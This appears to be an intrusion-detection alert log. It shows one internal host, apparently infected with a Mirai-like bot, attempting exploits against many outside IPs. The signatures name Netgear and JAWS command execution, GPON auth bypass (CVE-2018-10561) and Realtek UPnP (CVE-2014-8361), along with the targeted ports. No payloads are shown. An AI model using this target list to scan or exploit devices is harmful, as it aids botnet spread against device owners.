                                                                        2024-12-06T00:37:39.843997+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235510849.157.167.18380TCP
                                                                        2024-12-06T00:37:39.849063+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233584249.129.141.8280TCP
                                                                        2024-12-06T00:37:39.853774+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352754195.208.186.2238080TCP
                                                                        2024-12-06T00:37:39.886011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23520826.49.170.518080TCP
                                                                        2024-12-06T00:37:39.891802+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235931894.243.222.22480TCP
                                                                        2024-12-06T00:37:39.905571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342862114.22.5.1035555TCP
                                                                        2024-12-06T00:37:39.919013+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233646427.168.185.19780TCP
                                                                        2024-12-06T00:37:39.919013+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233646427.168.185.19780TCP
                                                                        2024-12-06T00:37:39.923735+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349536179.89.122.1707574TCP
                                                                        2024-12-06T00:37:39.940794+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236036465.174.66.625555TCP
                                                                        2024-12-06T00:37:39.941161+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2353280156.27.209.21652869TCP
                                                                        2024-12-06T00:37:39.945152+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346222156.138.134.24480TCP
                                                                        2024-12-06T00:37:39.945152+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346222156.138.134.24480TCP
                                                                        2024-12-06T00:37:40.213131+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344612135.5.55.7080TCP
                                                                        2024-12-06T00:37:40.433317+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353352158.47.178.1168080TCP
                                                                        2024-12-06T00:37:40.447750+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346438161.57.64.24580TCP
                                                                        2024-12-06T00:37:40.510308+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234559848.100.225.208080TCP
                                                                        2024-12-06T00:37:40.730047+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353358197.117.85.2308080TCP
                                                                        2024-12-06T00:37:40.850870+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346216192.249.201.197574TCP
                                                                        2024-12-06T00:37:40.895837+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341670132.8.111.937574TCP
                                                                        2024-12-06T00:37:40.902731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235826256.174.46.797574TCP
                                                                        2024-12-06T00:37:40.926639+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360558144.55.217.2580TCP
                                                                        2024-12-06T00:37:40.942583+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360076119.138.74.1317574TCP
                                                                        2024-12-06T00:37:40.942955+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355364135.190.139.97574TCP
                                                                        2024-12-06T00:37:40.943322+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352192197.14.86.1765555TCP
                                                                        2024-12-06T00:37:41.119992+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233824692.230.178.2680TCP
                                                                        2024-12-06T00:37:41.120091+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347898125.119.184.178080TCP
                                                                        2024-12-06T00:37:41.120881+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344590166.140.109.22280TCP
                                                                        2024-12-06T00:37:41.120995+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233850219.180.163.10180TCP
                                                                        2024-12-06T00:37:41.838597+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234230818.187.138.458080TCP
                                                                        2024-12-06T00:37:41.848799+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345780116.82.183.349152TCP
                                                                        2024-12-06T00:37:41.885066+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345912102.222.97.118080TCP
                                                                        2024-12-06T00:37:41.904992+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235270231.87.32.17980TCP
                                                                        2024-12-06T00:37:41.926762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234575634.126.250.6480TCP
                                                                        2024-12-06T00:37:41.926762+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234575634.126.250.6480TCP
                                                                        2024-12-06T00:37:42.072535+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350140123.98.76.11380TCP
                                                                        2024-12-06T00:37:42.416298+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233908424.143.8.478080TCP
                                                                        2024-12-06T00:37:42.431802+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234763029.122.56.1038080TCP
                                                                        2024-12-06T00:37:42.432305+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349836168.124.134.24380TCP
                                                                        2024-12-06T00:37:42.447442+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337760209.195.134.2128080TCP
                                                                        2024-12-06T00:37:42.447618+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2352718117.115.249.8780TCP
                                                                        2024-12-06T00:37:42.478535+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234893861.217.7.21980TCP
                                                                        2024-12-06T00:37:42.494313+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234532260.115.18.1128080TCP
                                                                        2024-12-06T00:37:42.509901+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342362219.123.46.828080TCP
                                                                        2024-12-06T00:37:42.510123+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23369342.186.161.1988080TCP
                                                                        2024-12-06T00:37:42.848298+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337800207.4.247.680TCP
                                                                        2024-12-06T00:37:42.866072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23570562.74.2.565555TCP
                                                                        2024-12-06T00:37:42.866436+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233998836.150.135.1327574TCP
                                                                        2024-12-06T00:37:42.874423+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355502179.83.210.875555TCP
                                                                        2024-12-06T00:37:42.875513+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346916218.184.194.19780TCP
                                                                        2024-12-06T00:37:42.891079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235314488.9.119.22480TCP
                                                                        2024-12-06T00:37:42.891079+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235314488.9.119.22480TCP
                                                                        2024-12-06T00:37:42.941097+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347434216.28.230.2080TCP
                                                                        2024-12-06T00:37:42.941465+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336648190.159.44.1938080TCP
                                                                        2024-12-06T00:37:43.119835+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338150180.23.193.19380TCP
                                                                        2024-12-06T00:37:43.119844+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359724131.52.222.21480TCP
                                                                        2024-12-06T00:37:43.135525+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354276151.243.65.1788080TCP
                                                                        2024-12-06T00:37:43.871202+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234276474.252.107.16380TCP
                                                                        2024-12-06T00:37:43.893710+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358350137.136.55.16880TCP
                                                                        2024-12-06T00:37:43.899531+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354982149.231.60.2680TCP
                                                                        2024-12-06T00:37:43.899531+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354982149.231.60.2680TCP
                                                                        2024-12-06T00:37:43.929735+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234614286.180.217.16252869TCP
                                                                        2024-12-06T00:37:43.930110+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23403982.191.113.14480TCP
                                                                        2024-12-06T00:37:43.930846+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235741838.46.178.5580TCP
                                                                        2024-12-06T00:37:43.931232+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359352171.151.153.2308080TCP
                                                                        2024-12-06T00:37:43.931962+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334132131.159.125.10080TCP
                                                                        2024-12-06T00:37:44.844622+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353124148.135.36.2497574TCP
                                                                        2024-12-06T00:37:44.844994+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357504141.90.6.14949152TCP
                                                                        2024-12-06T00:37:44.845725+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234264817.68.94.13980TCP
                                                                        2024-12-06T00:37:44.845725+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234264817.68.94.13980TCP
                                                                        2024-12-06T00:37:44.863925+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340008169.186.142.16880TCP
                                                                        2024-12-06T00:37:44.864296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233886657.217.97.23080TCP
                                                                        2024-12-06T00:37:44.864296+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233886657.217.97.23080TCP
                                                                        2024-12-06T00:37:44.910806+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2352730178.225.92.1552869TCP
                                                                        2024-12-06T00:37:44.917357+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352932137.140.180.4349152TCP
                                                                        2024-12-06T00:37:44.919932+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235602262.2.31.8880TCP
                                                                        2024-12-06T00:37:44.920302+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346606220.220.238.849152TCP
                                                                        2024-12-06T00:37:45.843818+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359606221.0.24.7280TCP
                                                                        2024-12-06T00:37:45.868511+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353446105.104.182.13080TCP
                                                                        2024-12-06T00:37:45.868879+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233846096.84.106.935555TCP
                                                                        2024-12-06T00:37:45.869618+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233554823.24.1.16080TCP
                                                                        2024-12-06T00:37:45.869618+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233554823.24.1.16080TCP
                                                                        2024-12-06T00:37:45.886696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235025490.127.51.1517574TCP
                                                                        2024-12-06T00:37:45.908851+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343692211.57.194.7980TCP
                                                                        2024-12-06T00:37:45.909954+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23328686.70.46.1698080TCP
                                                                        2024-12-06T00:37:45.910322+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333470131.76.152.1388080TCP
                                                                        2024-12-06T00:37:45.911423+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234288859.215.116.13149152TCP
                                                                        2024-12-06T00:37:45.916505+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335250120.181.234.19880TCP
                                                                        2024-12-06T00:37:45.916505+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335250120.181.234.19880TCP
                                                                        2024-12-06T00:37:45.919420+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235451817.19.142.17580TCP
                                                                        2024-12-06T00:37:45.919420+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235451817.19.142.17580TCP
                                                                        2024-12-06T00:37:45.926339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347428102.34.229.758080TCP
                                                                        2024-12-06T00:37:45.933247+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23340926.79.28.20580TCP
                                                                        2024-12-06T00:37:46.072549+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348240182.20.57.1988080TCP
                                                                        2024-12-06T00:37:46.135497+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339302130.211.189.24680TCP
                                                                        2024-12-06T00:37:46.181871+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341904199.32.40.928080TCP
                                                                        2024-12-06T00:37:46.837122+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357372192.106.15.498080TCP
                                                                        2024-12-06T00:37:46.838088+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357276120.29.235.480TCP
                                                                        2024-12-06T00:37:46.845726+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234437830.49.69.1615555TCP
                                                                        2024-12-06T00:37:46.867668+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343766200.77.31.2128080TCP
                                                                        2024-12-06T00:37:46.880646+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351446150.60.223.10352869TCP
                                                                        2024-12-06T00:37:46.895155+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348894201.212.218.3780TCP
                                                                        2024-12-06T00:37:46.896249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335868195.224.177.238080TCP
                                                                        2024-12-06T00:37:46.897349+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340758120.68.42.18480TCP
                                                                        2024-12-06T00:37:46.898456+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233496685.216.218.558080TCP
                                                                        2024-12-06T00:37:46.899193+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337422120.5.156.9680TCP
                                                                        2024-12-06T00:37:46.899193+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337422120.5.156.9680TCP
                                                                        2024-12-06T00:37:46.901375+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23607843.253.116.23280TCP
                                                                        2024-12-06T00:37:46.901744+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349356108.25.103.3852869TCP
                                                                        2024-12-06T00:37:46.902119+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345566213.217.112.1815555TCP
                                                                        2024-12-06T00:37:46.902491+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23606985.59.59.1808080TCP
                                                                        2024-12-06T00:37:46.903954+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342286151.98.201.687574TCP
                                                                        2024-12-06T00:37:47.137035+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348424193.85.195.20180TCP
                                                                        2024-12-06T00:37:47.137280+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341604179.228.190.11380TCP
                                                                        2024-12-06T00:37:47.845218+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336880176.28.20.1107574TCP
                                                                        2024-12-06T00:37:47.869515+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236064016.126.113.5380TCP
                                                                        2024-12-06T00:37:47.869515+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236064016.126.113.5380TCP
                                                                        2024-12-06T00:37:47.870166+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233717229.124.224.205555TCP
                                                                        2024-12-06T00:37:47.879295+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234954453.239.213.5880TCP
                                                                        2024-12-06T00:37:47.896676+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2332882132.174.227.852869TCP
                                                                        2024-12-06T00:37:47.915653+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234386645.176.18.1028080TCP
                                                                        2024-12-06T00:37:47.921040+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354770179.87.36.277574TCP
                                                                        2024-12-06T00:37:47.923589+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355802121.226.228.6552869TCP
                                                                        2024-12-06T00:37:48.849568+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334298106.58.97.4380TCP
                                                                        2024-12-06T00:37:48.866624+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360904199.56.161.20749152TCP
                                                                        2024-12-06T00:37:48.877540+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345944139.60.238.13080TCP
                                                                        2024-12-06T00:37:48.877540+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345944139.60.238.13080TCP
                                                                        2024-12-06T00:37:48.880113+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355236111.198.168.578080TCP
                                                                        2024-12-06T00:37:48.880847+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355496110.168.184.21552869TCP
                                                                        2024-12-06T00:37:48.881219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359772116.218.8.1395555TCP
                                                                        2024-12-06T00:37:48.897242+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342702134.87.227.8280TCP
                                                                        2024-12-06T00:37:48.897713+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337372116.235.110.918080TCP
                                                                        2024-12-06T00:37:48.897982+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234394833.166.72.1858080TCP
                                                                        2024-12-06T00:37:48.929622+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338620153.75.171.2105555TCP
                                                                        2024-12-06T00:37:48.937260+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355118140.224.1.6052869TCP
                                                                        2024-12-06T00:37:48.944174+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235793098.2.203.907574TCP
                                                                        2024-12-06T00:37:49.135107+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235219875.39.160.1780TCP
                                                                        2024-12-06T00:37:49.135461+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234915878.54.102.478080TCP
                                                                        2024-12-06T00:37:49.656875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339336112.120.244.23680TCP
                                                                        2024-12-06T00:37:49.849508+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235842620.241.173.7149152TCP
                                                                        2024-12-06T00:37:49.850975+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343494216.171.20.17252869TCP
                                                                        2024-12-06T00:37:49.851349+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23358305.111.53.20280TCP
                                                                        2024-12-06T00:37:49.851349+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23358305.111.53.20280TCP
                                                                        2024-12-06T00:37:49.851722+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235823297.40.54.2037574TCP
                                                                        2024-12-06T00:37:49.856734+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360866133.141.148.2338080TCP
                                                                        2024-12-06T00:37:49.861189+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335414104.136.146.2348080TCP
                                                                        2024-12-06T00:37:49.866272+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234827640.184.62.11480TCP
                                                                        2024-12-06T00:37:49.877171+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350534201.234.54.16849152TCP
                                                                        2024-12-06T00:37:49.877908+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233388239.254.157.298080TCP
                                                                        2024-12-06T00:37:49.878655+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234184485.207.18.180TCP
                                                                        2024-12-06T00:37:49.879023+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2336474116.1.174.13852869TCP
                                                                        2024-12-06T00:37:49.879761+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333838202.134.81.2008080TCP
                                                                        2024-12-06T00:37:49.880134+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234184083.130.81.1007574TCP
                                                                        2024-12-06T00:37:49.889972+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236077037.102.109.12549152TCP
                                                                        2024-12-06T00:37:49.903125+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233584698.118.127.22252869TCP
                                                                        2024-12-06T00:37:49.917675+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234972484.246.234.1198080TCP
                                                                        2024-12-06T00:37:49.927127+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233863663.131.84.1158080TCP
                                                                        2024-12-06T00:37:49.937659+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234041222.102.138.1338080TCP
                                                                        2024-12-06T00:37:49.943476+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354114116.6.239.1055555TCP
                                                                        2024-12-06T00:37:49.943854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233662223.62.238.147574TCP
                                                                        2024-12-06T00:37:50.010460+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333480151.38.93.1658080TCP
                                                                        2024-12-06T00:37:50.010493+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351358201.179.154.580TCP
                                                                        2024-12-06T00:37:50.010507+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339174216.56.177.1018080TCP
                                                                        2024-12-06T00:37:50.010755+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344464182.254.2.9780TCP
                                                                        2024-12-06T00:37:50.836699+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233340433.176.226.180TCP
                                                                        2024-12-06T00:37:50.836699+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233340433.176.226.180TCP
                                                                        2024-12-06T00:37:50.872296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235012489.171.214.7949152TCP
                                                                        2024-12-06T00:37:50.874859+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234933053.85.29.7980TCP
                                                                        2024-12-06T00:37:50.874859+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234933053.85.29.7980TCP
                                                                        2024-12-06T00:37:50.875593+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344796187.184.17.638080TCP
                                                                        2024-12-06T00:37:50.881398+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360636128.169.60.1597574TCP
                                                                        2024-12-06T00:37:50.882131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347210103.29.190.1777574TCP
                                                                        2024-12-06T00:37:50.888678+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234033040.161.115.848080TCP
                                                                        2024-12-06T00:37:50.890143+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233347016.149.53.1518080TCP
                                                                        2024-12-06T00:37:50.913757+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234751285.233.173.1865555TCP
                                                                        2024-12-06T00:37:50.928662+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336782214.192.111.11380TCP
                                                                        2024-12-06T00:37:50.931577+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23461845.138.139.6980TCP
                                                                        2024-12-06T00:37:50.978749+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2352754195.208.186.2238080TCP
                                                                        2024-12-06T00:37:50.994488+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23520826.49.170.518080TCP
                                                                        2024-12-06T00:37:51.846057+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234385889.209.200.1580TCP
                                                                        2024-12-06T00:37:51.852600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341550202.167.33.2157574TCP
                                                                        2024-12-06T00:37:51.865765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234972670.95.140.515555TCP
                                                                        2024-12-06T00:37:51.866500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233860042.25.58.22580TCP
                                                                        2024-12-06T00:37:51.866500+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233860042.25.58.22580TCP
                                                                        2024-12-06T00:37:51.867604+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235339494.18.186.24280TCP
                                                                        2024-12-06T00:37:51.867604+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235339494.18.186.24280TCP
                                                                        2024-12-06T00:37:51.867977+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233894260.58.179.10580TCP
                                                                        2024-12-06T00:37:51.875640+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359744144.219.209.2249152TCP
                                                                        2024-12-06T00:37:51.892021+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234440820.192.54.698080TCP
